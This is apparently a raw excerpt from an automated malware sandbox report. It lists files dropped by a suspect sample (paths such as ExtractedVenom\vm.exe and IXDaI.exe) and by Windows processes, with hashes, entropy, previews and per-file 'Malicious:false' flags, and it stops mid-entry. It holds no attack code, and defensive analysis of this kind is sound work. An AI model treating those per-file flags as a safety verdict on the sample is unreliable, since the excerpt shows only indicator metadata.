                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425340" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:Mini DuMP crash report, 15 streams, Wed Jul 24 17:57:41 2024, 0x1205a4 type
                                                                                    Category:dropped
                                                                                    Size (bytes):139198
                                                                                    Entropy (8bit):2.1099278662545324
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:ejoynz6mPeujffjmjZgKB/2FfaA7DzW6uyXDyU:qPEuKB/2FrfWIX+U
                                                                                    MD5:F1A22CF8AF06B56C9BC741C0E49C89BD
                                                                                    SHA1:217E30181C4751D82F88D5A2B057A48FCDD3C1FD
                                                                                    SHA-256:20F54BD8AFBA8476E067BB330ABF27FF5811D8D25E9A4B3B0C98BB9DAEEB68A3
                                                                                    SHA-512:1ACE86178C2B0D8C522951B27B6C7AA708710501CB83C13B31B7FB246F1CD003C78A7C809047045580204E1CD7B5332F070E5462B180D13AA7CB90B5A72B5E1E
                                                                                    Malicious:false
                                                                                    Preview:MDMP..a..... ........@.f........................|...........,...d"......4....[..........`.......8...........T............F...............#..........|%..............................................................................eJ.......&......GenuineIntel............T...........z@.f............................. ..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):6332
                                                                                    Entropy (8bit):3.7286234020444384
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:R6l7wVeJlZ6AZCWYxgpr9P89bmPsfcOCm:R6lXJL6AdYxfm0fci
                                                                                    MD5:5A1D84C51B81AB0CA27C8338AE9ED74D
                                                                                    SHA1:33784DFFE45A2DD84FD5998AD1C6AA10C91E9294
                                                                                    SHA-256:6FA79DE616B2C74BDE369260340F122CEAD97A57FC82EBE925131338738766BF
                                                                                    SHA-512:85A57C078EDE1233E61F2ED445028230E6235EEB1A543E078BA981B89C1507BA9C9BDCED5AFE40A9166F946EC6592F4D5EC0116AB61B1268FE0F043D3BDC8357
                                                                                    Malicious:false
                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.6.4.<./.P.i.
                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):4646
                                                                                    Entropy (8bit):4.4735061016023225
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:cvIwWl8zs0Jg77aI9diWpW8VYVYm8M4JFDD09TFS+q8v1RRGqoyoO3c9d:uIjfyI7jj7VJJt3k8tyoOM9d
                                                                                    MD5:CEFEB04CF6281BC7B271A050E44489EB
                                                                                    SHA1:648812B9F06989387129096AA4E499494CC2E2B9
                                                                                    SHA-256:CC48560A129F4965EC6121247F870808F5A1E4712744CC87D777D2BC75AFC4CB
                                                                                    SHA-512:69B8C082DB7932F440D9B182CFC5FCE2E3CC762D39B41F3434567C4887193FE2F4A8E1F200BA4B28A82886CC79498E0DA0760E2F394BA18C07463E32FCB432D8
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425340" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                    Process:C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
                                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):71954
                                                                                    Entropy (8bit):7.996617769952133
                                                                                    Encrypted:true
                                                                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                    Malicious:false
                                                                                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                    Process:C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):328
                                                                                    Entropy (8bit):3.2478978672539016
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:kKBU9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:hDImsLNkPlE99SNxAhUe/3
                                                                                    MD5:6B0D8C16768BA1CD16B684CAF2D40B6F
                                                                                    SHA1:1CD603A137CFB1A77EF84183836C517490DD5048
                                                                                    SHA-256:754FE90A97340FEEEA3AF1926F010D755D95D74F26FEBFDEB1C6338F5431AC70
                                                                                    SHA-512:F76E86E7B33D4CBC2B2B19B5D559F13DF93DAAE73CA4FCD9F92998EB74DCBD0A4F998BAA3EB89CD742F4A61D1DEA474E180322841195E2586327B177C18AF5C9
                                                                                    Malicious:false
                                                                                    Preview:p...... ................(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                    Process:C:\Users\user\AppData\Local\Temp\753F.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):1515
                                                                                    Entropy (8bit):5.3602768626210215
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNXE4ZR:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                    MD5:366F3274873188864F1C9DC2A155FE99
                                                                                    SHA1:DC6D430ADC2BF68980D60D32832F937A19002970
                                                                                    SHA-256:942877BF38C3575135E9008E3C2880D64ED5D43E32F125E05DD4D969357EB92F
                                                                                    SHA-512:1146FD3F3661BF222A48E0C51909C64A57B322556D8C43DDCEB2CF7A3F07F99B7AECC843211B3598643EF447D651873BA13AD335FB74004CE3B51F8F98C22156
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                    Process:C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):942
                                                                                    Entropy (8bit):5.350509596383769
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ML9E4KiE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKiHKnYHKh3oPtHo6hAHKzeR
                                                                                    MD5:B6D3844EAA406C781DC083A57D80B31D
                                                                                    SHA1:A86C11005B4765CF80CE96F09686B601DD3F87D7
                                                                                    SHA-256:FC52CE6F1AE1858EFB752C50FD39D3FD82CC2605B95E94B9C16FB9220BC25D20
                                                                                    SHA-512:08CD3FFA613D2A95564DFEBBE5C9CFB3CA7B903BAF0F1105AECB039420C9126B06A1CA6D7DA562F18DB1C28B4877D84C98AE74C7AB4799DE8B8C5381F4390462
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:JSON data
                                                                                    Category:modified
                                                                                    Size (bytes):1018
                                                                                    Entropy (8bit):5.235990633565231
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:YqHZ6T06Mhmpvmyb0O0bihmAvmy6CUXyhmDvmybxdB6hmKvmyz0JahmlvmybNdBd:YqHZ6T06McEyb0O0biczyDUXycaybxdp
                                                                                    MD5:0D158326133D9F27F44A933593B668BB
                                                                                    SHA1:634FB34DC528526CA14417C73DBC57C6A1155D28
                                                                                    SHA-256:F0C4D41D7073B5255B4F85056C20C29F4435D540A0C9D6D9EED8B38F6508D9FC
                                                                                    SHA-512:D108588E8D57AC94B4763A8C07C25E62F11CB089084791E5DF7C0621E3229E0637B9BBCE1AC26583889230B2517125CAC680CFD688BEFF5159C88771A9F89024
                                                                                    Malicious:false
                                                                                    Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":1015884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":1005884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":995884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":985884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":975884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":965884592,"LastSwitchedHighPart":31061873,"Pre
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):404
                                                                                    Entropy (8bit):7.237769240723788
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:6v/78/vlRYiss4zKRkj051UImYiyx5NDqxa5U6:16/KSI/mODN+xh6
                                                                                    MD5:3905593FDAF39CF1418D923565E08345
                                                                                    SHA1:20B73D80CADF71956847FFBE0E264811D03680EE
                                                                                    SHA-256:156521BB822C49F02192EFB0062095AC0710A36E02F50D72F26AAD6C50F27479
                                                                                    SHA-512:6EF1E8F393AC0FD89D58E29F44602E21AD3829F47CE9FE43C9E8F9F2F14FCEBAC3A2F04DE8671767F57922C0144FBDEE812548DC6DB25CBC800271AD25D9102D
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR................a....sRGB.........gAMA......a....>IDAT8O.?K.A..g.lDlUr`c#.$...m.S.(...6..E..+...H@..*pIk."....k.Bo|sY<m...?nwf...]...1....\..x..!.YFT..'&..Q.u.5...=.u..NY...+s.u-.p.q..C..y..s...+$.E...i..N......%vO.?...BZ%v:}..;X.Y..Vx.....o.........aoj6..../P7u*5.L.-.2..x..s.E?B...1=.o.7.K..;...sd......vl......5..}L.4..^.......&...+.s.....6..j....;..huC-.<....IEND.B`.
                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):4
                                                                                    Entropy (8bit):1.5
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nv:9
                                                                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                    Malicious:false
                                                                                    Preview:foo.
                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):4
                                                                                    Entropy (8bit):1.5
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nv:9
                                                                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                    Malicious:false
                                                                                    Preview:foo.
                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):4
                                                                                    Entropy (8bit):1.5
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nv:9
                                                                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                    Malicious:false
                                                                                    Preview:foo.
                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):4
                                                                                    Entropy (8bit):1.5
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nv:9
                                                                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                    Malicious:false
                                                                                    Preview:foo.
                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):4
                                                                                    Entropy (8bit):1.5
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nv:9
                                                                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                    Malicious:false
                                                                                    Preview:foo.
                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):4
                                                                                    Entropy (8bit):1.5
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nv:9
                                                                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                    Malicious:false
                                                                                    Preview:foo.
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):9434
                                                                                    Entropy (8bit):4.928515784730612
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                    MD5:D3594118838EF8580975DDA877E44DEB
                                                                                    SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                    SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                    SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                    Malicious:false
                                                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):4
                                                                                    Entropy (8bit):1.5
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nv:9
                                                                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                    Malicious:false
                                                                                    Preview:foo.
                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):4
                                                                                    Entropy (8bit):1.5
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nv:9
                                                                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                    Malicious:false
                                                                                    Preview:foo.
                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    File Type:ASCII text
                                                                                    Category:modified
                                                                                    Size (bytes):4
                                                                                    Entropy (8bit):1.5
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nv:9
                                                                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                    Malicious:false
                                                                                    Preview:foo.
                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):4
                                                                                    Entropy (8bit):1.5
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nv:9
                                                                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                    Malicious:false
                                                                                    Preview:foo.
                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):4
                                                                                    Entropy (8bit):1.5
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nv:9
                                                                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                    Malicious:false
                                                                                    Preview:foo.
                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):4
                                                                                    Entropy (8bit):1.5
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nv:9
                                                                                    MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                    SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                    SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                    SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                    Malicious:false
                                                                                    Preview:foo.
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):141944
                                                                                    Entropy (8bit):5.653169478479977
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:0OrbHDFbGsQ/Q/WGX5Nqzaiz1agCDP2zJ43MOkCYZZ2vWFx6qKZ:9rLDFbGYHiYbP2qkf2Kx6N
                                                                                    MD5:B6A1C0998D0A7979C9EC17B8D5CF8A81
                                                                                    SHA1:32154E9BDCD0975A4095A88B68834E2DA21412DD
